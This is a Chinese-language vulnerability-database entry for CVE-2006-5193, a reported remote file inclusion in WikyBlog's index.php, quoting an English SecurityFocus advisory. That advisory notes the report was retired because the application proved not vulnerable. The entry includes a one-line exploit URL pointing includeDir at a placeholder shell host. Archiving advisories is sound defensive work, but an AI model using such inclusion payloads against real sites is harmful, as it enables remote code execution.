RETIRED: WikyBlog 'index.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111197 漏洞类型 输入验证
发布时间 2006-10-05 更新时间 2006-10-16
CVE编号 CVE-2006-5193 CNNVD-ID CNNVD-200610-158
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28761
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-158
|漏洞详情
JoshSchmidtWikyBlog的index.php中存在PHP远程文件包含漏洞,远程攻击者可借助includeDir参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/20350/info

WikyBlog is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

WikyBlog 1.2.3 and earlier versions are vulnerable; other versions may also be affected.

Update: This BID is being retired; further information reveals that the application is not vulnerable to this issue.

http://www.example.com/[scriptPath]/index.php?includeDir=http://SHELLURL.COM
|参考资料

来源:XF
名称:wikyblog-index-file-include(29331)
链接:http://xforce.iss.net/xforce/xfdb/29331
来源:BID
名称:20350
链接:http://www.securityfocus.com/bid/20350
来源:BUGTRAQ
名称:20061006Re:WikyBlog<=v1.4(WN_BASEDIR)RemoteFileInclusionExploit
链接:http://www.securityfocus.com/archive/1/archive/1/447896/100/0/threaded
来源:BUGTRAQ
名称:20061004WikyBlog<=v1.4(WN_BASEDIR)RemoteFileInclusionExploit
链接:http://www.securityfocus.com/archive/1/archive/1/447735/100/0/threaded